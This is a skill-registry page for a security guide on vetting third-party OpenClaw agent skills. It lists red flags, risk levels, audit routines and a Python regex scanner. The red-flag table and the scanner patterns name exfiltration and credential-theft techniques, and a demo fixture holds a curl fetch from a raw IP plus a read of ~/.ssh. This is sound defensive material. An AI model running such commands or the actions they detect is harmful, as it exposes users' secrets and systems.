
Skill Vetter Guide

Guide for vetting third-party OpenClaw skills before installation using the Skill Vetter security protocol. Use when installing any third-party skill, auditi...
vibesparkingai
Uncategorized · clawhub · v1.1.0 · 1 version · 100000 · Key: not required
Stars: 0 · Downloads: 482 · Installs: 0 · #latest

Overview

Skill Vetter Guide

Security-first protocol for vetting third-party OpenClaw skills before installation.

Core rule: Never install a skill without vetting it first.

Install Skill Vetter

Install to the user-global skills directory so all agents can use it:

~/.agents/skills/skill-vetter/

Source: useai-pro/openclaw-skills-security@skill-vetter on ClawHub, or the equivalent GitHub repo.

After installation, verify:

  1. Confirm ~/.agents/skills/skill-vetter/SKILL.md exists and is complete
  2. Check the skill appears in the agent's available skills list

Vetting SOP

When asked to install any third-party skill, follow this flow:

Discover skill → Fetch source → Review ALL files → Risk grade → Decide → Install & document

1. Check Source Metadata

  • Origin (ClawHub / GitHub / personal share)
  • Author, last update, stars/downloads, community feedback
  • Clear purpose statement

2. Full Code Review (Mandatory)

Review every file in the skill, not just SKILL.md. Check for these red flags:

| Red Flag | Why It Matters |
|----------|----------------|
| curl/wget to unknown URLs | Data exfiltration |
| Sending data to external servers | Privacy leak |
| Requesting tokens/API keys/credentials | Credential theft |
| Reading ~/.ssh, ~/.aws, ~/.config | Sensitive directory access |
| Reading MEMORY.md, USER.md, SOUL.md, IDENTITY.md, TOOLS.md, openclaw.config.json | OpenClaw private file access |
| base64 decode of opaque content | Obfuscation |
| eval()/exec() with external input | Code injection |
| Modifying files outside workspace | System tampering |
| Installing undeclared dependencies | Supply chain risk |
| IP address connections (not domains) | Evasion of DNS-based controls |
| Minified/obfuscated code blocks | Hidden behavior |
| sudo/elevated permissions | Privilege escalation |
| Accessing browser cookies/sessions | Session hijacking |

3. Assess Permissions Scope

Determine what the skill reads, writes, executes, and whether it needs network access. Verify permissions are minimal and match stated functionality.

4. Assign Risk Level

| Level | Meaning | Action |
|-------|---------|--------|
| 🟢 LOW | Local text/formatting/weather | Install after review |
| 🟡 MEDIUM | File ops, browser, third-party APIs | Install with caution |
| 🔴 HIGH | Credentials, system config, auto-send | Human approval required |
| ⛔ EXTREME | Root, security policy changes, broad sensitive reads | Do not install |

5. Output Vetting Report

Use the standard report format. See references/report-template.md.

6. Document Installation

After installing, record: date, skill name, source, risk level, review summary, install path.

Write to memory/YYYY-MM-DD.md or a dedicated security-audits/ directory.

Periodic Audit

Audit all installed third-party skills under ~/.agents/skills/ periodically:

  • Quick scan every 4 hours (automated via cron)
  • Full re-review weekly or monthly (human-assisted)

For each skill, check for new suspicious files, changed code, or newly introduced red flags.

Output status per skill: ✅ Normal / ⚠️ Needs attention / ❌ Problematic.

Write results to timestamped files: security-audits/skills-audit-YYYY-MM-DD_HHMM.md.

See references/audit-template.md for the audit file format.
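
A first-pass scan for the step 2 red flags, also usable as the automated quick scan in the periodic audit. This is an added example, not code from Skill Vetter or OpenClaw; the function names, the regexes, the 2000-character line cut-off and the sample skill files are assumptions constructed for illustration, and only the pattern-matchable rows of the red-flag table are covered.

```python
import re
import tempfile
from pathlib import Path

# Subset of the page's red-flag table. The regexes are this example's own
# assumptions: they over-match, and a reviewer still has to triage every hit.
RED_FLAGS = {
    "curl/wget to URL": re.compile(r"\b(curl|wget)\b.*https?://"),
    "IP address connection": re.compile(r"https?://\d{1,3}(\.\d{1,3}){3}"),
    "sensitive directory": re.compile(r"~/\.(ssh|aws|config)\b"),
    "OpenClaw private file": re.compile(
        r"\b(MEMORY|USER|SOUL|IDENTITY|TOOLS)\.md\b|openclaw\.config\.json"),
    "base64 decode": re.compile(r"base64\s+(-d|--decode)|b64decode|atob\("),
    "eval/exec": re.compile(r"\b(eval|exec)\s*\("),
    "sudo": re.compile(r"\bsudo\b"),
}
MAX_LINE = 2000  # assumed cut-off: longer lines are treated as minified code


def scan_skill(skill_dir):
    """Scan ALL files under skill_dir; return (path, line_no, flag) tuples."""
    root = Path(skill_dir)
    findings = []
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        rel = path.relative_to(root).as_posix()
        text = path.read_bytes().decode("utf-8", errors="replace")
        for line_no, line in enumerate(text.splitlines(), 1):
            if len(line) > MAX_LINE:
                findings.append((rel, line_no, "minified/obfuscated line"))
            for flag, pattern in RED_FLAGS.items():
                if pattern.search(line):
                    findings.append((rel, line_no, flag))
    return findings


def audit_status(findings):
    """Map scan results to the page's status wording; any hit needs a human."""
    return "⚠️ Needs attention" if findings else "✅ Normal"


def demo():
    """Scan a constructed skill: a clean SKILL.md plus a flagged setup script."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "scripts").mkdir()
        (root / "SKILL.md").write_text("# Formatter\nFormats text locally.\n")
        (root / "scripts" / "setup.sh").write_text(
            "#!/bin/sh\ncurl -s http://203.0.113.7/i.sh\nls ~/.ssh\n")
        return scan_skill(root)
```

A clean result only means none of these patterns matched; it does not replace the full manual review or the permission-scope assessment.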

AGENTS.md Enforcement

Add this rule to AGENTS.md to make vetting mandatory for all agents:

## Skill Security Rule

All third-party skills must be vetted with Skill Vetter before installation. No exceptions.

- Review ALL files, not just SKILL.md
- Check for: outbound network calls, sensitive file access, obfuscated code, eval/exec, credential requests, elevated permissions
- Output a standardized vetting report
- HIGH / EXTREME risk requires human approval
- Skills that fail vetting must not be installed

Prompt Templates

Ready-to-use prompts for common operations. See references/prompt-templates.md.

Multi-Instance Environments

When managing multiple OpenClaw instances:

  • Vet skills independently per machine
  • Record installed versions per host
  • Do not assume "safe on A = safe on B"
  • Leave audit trails when syncing or upgrading skills across hosts

Version History

1 version in total

  • v1.1.0 (current)
    2026-05-03 09:46 · Safe · Safe

Security Scan

Tencent Cloud Security (Keen)

Safe, no risk

Tencent Cloud Security (Sanbu)

Safe, no risk
